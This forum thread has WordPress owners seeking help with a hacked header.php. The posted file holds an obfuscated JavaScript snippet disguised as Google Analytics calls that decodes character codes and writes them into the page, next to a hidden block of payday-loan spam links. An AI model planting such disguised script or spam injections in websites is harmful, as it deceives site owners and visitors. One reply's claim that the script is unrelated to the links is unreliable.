script breakdown help

iknowjack

iknowjack

Power Member
Joined
Jul 25, 2009
Messages
583
Reaction score
106
today i find out my wp website is serving some ads for which i did not know
so i wonder if someone can help me what exactly did the script do, was there some ip based script (i noticed this script by accident when i tried my website through a us based proxy...later i logged into with ftp account and start looking files and i found this in my header.php)

i would also appreciate if someone could indemnify what i need to remove, since i wont to remove to less, but on other side i dont want to remove to little
Code: 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type') ?>; charset=<?php bloginfo('charset') ?>" />
<title><?php wp_title( '|', true, 'right' ); bloginfo( 'name' ); ?></title>
<link rel="stylesheet" href="<?php bloginfo('stylesheet_url') ?>" type="text/css" media="screen" />
<!--[if IE 6]><link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/style.ie6.css" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/style.ie7.css" type="text/css" media="screen" /><![endif]-->
<?php if(WP_VERSION < 3.0): ?>
<link rel="alternate" type="application/rss+xml" title="<?php printf(__('%s RSS Feed', THEME_NS), get_bloginfo('name')); ?>" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php printf(__('%s Atom Feed', THEME_NS), get_bloginfo('name')); ?>" href="<?php bloginfo('atom_url'); ?>" />
<?php endif; ?>
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php
remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');
if ( is_singular() && get_option( 'thread_comments' ) ) {
    wp_enqueue_script( 'comment-reply' );
}
wp_head(); ?>
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/script.js"></script>
</head>
<body <?php if(function_exists('body_class')) body_class(); ?>>

<script language="JavaScript">var _ga0 = [];    _ga0.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);    _ga0.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);    _ga0.push(['_trackPageview', '1184165171180193182181185175186175181180128167168185181']);    _ga0.push(['_trackPageview', '1781871861711291691781751821281841711691861101221221231']);    _ga0.push(['_setPageId', '8219011416718718618111416718718618111412212212318219011']);    _ga0.push(['_trackPageview', '1129195130117185186191178171132']);    var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga0.length; v++) t += _ga0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en><p>Where borrowers that needs extra paperwork payday loans online <a href="http://perapaydayloansonline.com" title="payday loans online">payday loans online</a> plus an upcoming paycheck. So having to inquire more for apply anytime you be cash advance loans <a href="http://qazonlinecashadvance.com" title="cash advance loans">cash advance loans</a> followed in this but they do so. Look through terrible credit in with instant payday loans <a href="http://borshinstantcashadvance.com" title="instant payday loans">instant payday loans</a> reasonable time faxing needed. Whether you sign a valid identification and cash advance mn <a href="http://kerinstallmentcashadvance.com" title="cash advance mn">cash advance mn</a> without credit a mortgage. Obtaining best score to it possible that real payday loans online <a href="http://rekinstantpaydayloans.com" title="real payday loans online">real payday loans online</a> pop up in place. With a portion of season tickets for employees using direct lender payday loans online <a href="http://denpersonalloansonline.com" title="direct lender payday loans online">direct lender payday loans online</a> ach electronic of conclusion getting some collateral. This money now all depend on whether quick cash advances <a href="http://ondcashadvanceonline.com" title="quick cash advances">quick cash advances</a> or anything for offline. Applying online from having volunteer supporting http://vendinstallmentloans.com <a href="http://vendinstallmentloans.com" title="http://vendinstallmentloans.com">http://vendinstallmentloans.com</a> loan today for approval. Applicants have the processing money without risking loan approval payday loans <a href="http://inapersonalloans.com" title="payday loans">payday loans</a> so long period by giving you yet. Qualifying for everyone needs extra paperwork plus an employee has payday loans online <a href="http://loronlinepersonalloans.com" title="payday loans online">payday loans online</a> to make money into these new one. Overdue bills in urgent funds that many online cash advance <a href="http://pincashadvance.com" title="online cash advance">online cash advance</a> lenders to magnum cash easy. Turn your payments you and fees involved no http://kopainstallmentpaydayloansonline.com <a href="http://kopainstallmentpaydayloansonline.com" title="http://kopainstallmentpaydayloansonline.com">http://kopainstallmentpaydayloansonline.com</a> faxing several times at once. Look through at least the applicants are settled completely payday loans check <a href="http://getin10minpaydayloans.com" title="payday loans check">payday loans check</a> effortless the secured by a negative experience. Being approved the bill and other reliable source payday loans <a href="http://ukropinstantloans.com" title="payday loans">payday loans</a> for money through to repay. Any individual lender if your monthly payments in us payday loans <a href="http://kloponlinepaydayloans.com" title="us payday loans">us payday loans</a> lending in working at home foreclosure. Obtaining best bet is tight situation has its installment loan <a href="http://pinainstallmentpaydayloans.com" title="installment loan">installment loan</a> own computer to lower score.</p></div>
<div id="art-page-background-middle-texture">
<div id="art-page-background-glare-wrapper">
    <div id="art-page-background-glare"></div>
</div>
<div id="art-main">
    <div class="cleared reset-box"></div>
    <div class="art-box art-sheet">
        <div class="art-box-body art-sheet-body">
            <div class="art-header">
                <div class="art-logo">
                        </div>
            </div>
            <div class="cleared reset-box"></div>
            <div class="art-bar art-nav">
                <div class="art-nav-outer">
                <?php 
                    echo theme_get_menu(array(
                            'source' => theme_get_option('theme_menu_source'),
                            'depth' => theme_get_option('theme_menu_depth'),
                            'menu' => 'primary-menu',
                            'class' => 'art-hmenu'    
                        )
                    );
                ?>
                </div>
            </div>
            <div class="cleared reset-box"></div>


innozemec you said you cant spot the code, so i will put it here again....its in above code, perhaps you didnt move window to the right ?
so i am just making it easier to spot



Code: 
<div class=slider_wrapper_en><p>Where borrowers that needs extra paperwork payday loans online 
<a href="http://perapaydayloansonline.com" title="payday loans online">payday loans online</a> plus an upcoming paycheck. So having to inquire more for apply anytime you be cash advance loans
 <a href="http://qazonlinecashadvance.com" title="cash advance loans">cash advance loans</a> followed in this but they do so. Look through terrible credit in with instant payday loans <a href="http://borshinstantcashadvance.com" title="instant payday loans">instant payday loans</a> reasonable time faxing needed. Whether you sign a valid identification and cash advance mn
 <a href="http://kerinstallmentcashadvance.com" title="cash advance mn">cash advance mn</a> without credit a mortgage. Obtaining best score to it possible that real payday loans online 
<a href="http://rekinstantpaydayloans.com" title="real payday loans online">real payday loans online</a> pop up in place. With a portion of season tickets for employees using direct lender payday loans online 
<a href="http://denpersonalloansonline.com" title="direct lender payday loans online">direct lender payday loans online</a> ach electronic of conclusion getting some collateral. This money now all depend on whether quick cash advances <a href="http://ondcashadvanceonline.com" title="quick cash advances">quick cash advances</a> or anything for offline. Applying online from having volunteer supporting http://vendinstallmentloans.com
 <a href="http://vendinstallmentloans.com" title="http://vendinstallmentloans.com">http://vendinstallmentloans.com</a> loan today for approval. Applicants have the processing money without risking loan approval payday loans <a href="http://inapersonalloans.com" title="payday loans">payday loans</a> so long period by giving you yet. Qualifying for everyone needs extra paperwork plus an employee has payday loans online <a href="http://loronlinepersonalloans.com" title="payday loans online">payday loans online</a> to make money into these new one. Overdue bills in urgent funds that many online cash advance <a href="http://pincashadvance.com" title="online cash advance">online cash advance</a> lenders to magnum cash easy. Turn your payments you and fees involved no http://kopainstallmentpaydayloansonline.com
 <a href="http://kopainstallmentpaydayloansonline.com" title="http://kopainstallmentpaydayloansonline.com">http://kopainstallmentpaydayloansonline.com</a> faxing several times at once. Look through at least the applicants are settled completely payday loans check <a href="http://getin10minpaydayloans.com" title="payday loans check">payday loans check</a> effortless the secured by a negative experience. Being approved the bill and other reliable source payday loans 
<a href="http://ukropinstantloans.com" title="payday loans">payday loans</a> for money through to repay. Any individual lender if your monthly payments in us payday loans <a href="http://kloponlinepaydayloans.com" title="us payday loans">us payday loans</a> lending in working at home foreclosure. Obtaining best bet is tight situation has its installment loan <a href="http://pinainstallmentpaydayloans.com" title="installment loan">installment loan</a> own computer to lower score.</p></div>
 
Last edited:
Advertise on BHW
i am not seeing any php/javascript code that might be displaying ads in here.. maybe it is in some other file?
 
well, thats pure html put into your header file.. I saw it, but i wasn't looking for it, but for a script code that could be reading ads from somewhere..

so, just remove those links and you won't be having any ads..
 
innozemec said:
well, thats pure html put into your header file.. I saw it, but i wasn't looking for it, but for a script code that could be reading ads from somewhere..

so, just remove those links and you won't be having any ads..
Click to expand...

the thing i could see those links only through us proxy (out of curiosity i tried today my website through us proxy and i found tonz of those links). if i load my website normally (i am from europe) i couldnt see those links
so i thought someone will explain me if that thats because of script before those links, and hopefully someone will explain me how that script works. it doesnt look to be some ip based script, or is it ?
 
no there is no script, no geoip filtering or anything.. it just just html links hardcoded into the source code and you should be seeing them no matter how you access your site.. the javascript right before the links do not have anything to do with them..
 
maybe you have some adware installed on your comp you are unwaware of and it is placing ads on your site or sites.


edit: i missed read it.
 
sapo said:
maybe you have some adware installed on your comp you are unwaware of and it is placing ads on your site or sites.


edit: i missed read it.
Click to expand...

sounds logical.. though it shouldn't be that as he is showing us here the source code of the header.php and it contains the links hardcoded in it.. so it shouldn't be his browser.. maybe server hack
 
innozemec said:
sounds logical.. though it shouldn't be that as he is showing us here the source code of the header.php and it contains the links hardcoded in it.. so it shouldn't be his browser.. maybe server hack
Click to expand...

yup defiantly.

OP do you have any nulled or ify or outdated plugins?

I used to always have my sites hacked/taken over cause I would install nulled software and plugins etc etc and then my site will always eventually sometime immediately or down the road be redirected to some .ru domain, so just be aware of this.

Now i always purchase my script, better to side on the side of caution then not.


check your logs and contact your support depending on you use they should be able to help.
 
I have got the same script in <head>

var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setPageId', '6918518510413211618618118716917416519219318218118517518']);
_ga4.push(['_setOption', '6175181180128167168185181178187186171129169178175182128']);
_ga4.push(['_setPageId', '1841711691861101221211241821901141671871861811141671871']);
_ga4.push(['_trackPageview', '8618111412212112418219011112919513011718518619117817113']);
_ga4.push(['_trackPageview', '2']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);


and links to different loan websites in <body>. I tried to disable all plugins but that didn't help to remove these extra code/lines.
 
chapcher said:
I have got the same script in <head>

var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setPageId', '6918518510413211618618118716917416519219318218118517518']);
_ga4.push(['_setOption', '6175181180128167168185181178187186171129169178175182128']);
_ga4.push(['_setPageId', '1841711691861101221211241821901141671871861811141671871']);
_ga4.push(['_trackPageview', '8618111412212112418219011112919513011718518619117817113']);
_ga4.push(['_trackPageview', '2']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);


and links to different loan websites in <body>. I tried to disable all plugins but that didn't help to remove these extra code/lines.
Click to expand...

Yeah i had the same script.. however I have bought all of my themes and plugin... but there were few plugins I was downloading from blackhat sources... :( I removed this part from my header.php file:

PHP: 
<script language="JavaScript">var _ga0 = [];    _ga0.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);    _ga0.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);    _ga0.push(['_setPageId', '1184165171180193182181185175186175181180128167168185181']);    _ga0.push(['_setOption', '1781871861711291691781751821281841711691861101221221201']);    _ga0.push(['_setPageId', '8219011416718718618111416718718618111412212212018219011']);    _ga0.push(['_trackPageview', '1129195130117185186191178171132']);    var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga0.length; v++) t += _ga0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en><p>To stress on friday might not legally online payday loans <a href="http://loronlinepersonalloans.com" title="online payday loans">online payday loans</a> allowed to magnum cash available? Bad credit checkthe best that you falls payday loans <a href="http://inapersonalloans.com" title="payday loans">payday loans</a> onto our of documentation. Visit our loans outstanding payday is common kloponlinepaydayloans.com <a href="http://kloponlinepaydayloans.com" title="kloponlinepaydayloans.com">kloponlinepaydayloans.com</a> but you work at most. The type and within hours a permanent solution for chase cash advance online <a href="http://ukropinstantloans.com" title="chase cash advance online">chase cash advance online</a> small fee payday at the emergency. Repaying a consumer credit so keep the small cash advance loans <a href="http://qazonlinecashadvance.com" title="cash advance loans">cash advance loans</a> measure of at their employer. Hour payday at conventional lending institutions payday loans online <a href="http://denpersonalloansonline.com" title="payday loans online">payday loans online</a> will save their risk. Repayments are more room on more debt has never a one hour cash advance <a href="http://ondcashadvanceonline.com" title="one hour cash advance">one hour cash advance</a> special occasion emergency can fill out there. Here we have listed but making the current installment loans <a href="http://pinainstallmentpaydayloans.com" title="installment loans">installment loans</a> need deposited in via a mortgage. What can help recovering their should use bad credit installment loans <a href="http://kopainstallmentpaydayloansonline.com" title="bad credit installment loans">bad credit installment loans</a> that provides a daily basis. Typically a consumer credit online to loan rates <a href="http://vendinstallmentloans.com" title="loan rates">loan rates</a> wait patiently for offline. Typically a book for deposited within days there cash advance online <a href="http://kerinstallmentcashadvance.com" title="cash advance online">cash advance online</a> unsecured which saves both feet. Look through their verification will include money to online cash advance no fax <a href="http://pincashadvance.com" title="online cash advance no fax">online cash advance no fax</a> financial troubles at these simple criteria. Typically a new technological innovation it should payday loans <a href="http://getin10minpaydayloans.com" title="payday loans">payday loans</a> figure out is simple. You also want the revolving door and real payday loans online <a href="http://perapaydayloansonline.com" title="real payday loans online">real payday loans online</a> do with this will need. What is beneficial if those bank to no faxing payday loans <a href="http://borshinstantcashadvance.com" title="no faxing payday loans">no faxing payday loans</a> owing late fees involved whatsoever. Information about yourself and will review your name social instant no fax payday loans <a href="http://rekinstantpaydayloans.com" title="instant no fax payday loans">instant no fax payday loans</a> security makes the forfeiture and respect.</p></div>
<div style="position: relative">

COPY AND PASTE it on notpad! DO I have to remove all of my plugins or?
 
I've also had this show up in my WP. Do I need to delete the links from the header or do I also need to delete this?
I have got the same script in <head>

var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901 861171']);
_ga4.push(['_setPageId', '6918518510413211618618118716917416519219318218118 517518']);
_ga4.push(['_setOption', '6175181180128167168185181178187186171129169178175 182128']);
_ga4.push(['_setPageId', '1841711691861101221211241821901141671871861811141 671871']);
_ga4.push(['_trackPageview', '8618111412212112418219011112919513011718518619117 817113']);
_ga4.push(['_trackPageview', '2']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);
 
Advertise on BHW
You must log in or register to reply here.
Sign up now!

Main Menu

Home Main Forum List Black Hat SEO White Hat SEO BHW Newbie Guide Blogging Black Hat Tools Social Media Downloads

Marketplace

Account Selling Content / Copywriting EBooks / Methods Hosting Misc Proxies For Sale SEO - Link building SEO - Packages Social Media Social Media - Panels Web Design More

Making Money

Affiliate Programs Hire a Freelancer IM Journeys Making Money Pay Per Click Site Flipping Want to Buy

BlackHat World

Dispute Resolution Forum Suggestions & Feedback Introductions Lounge
Back
Top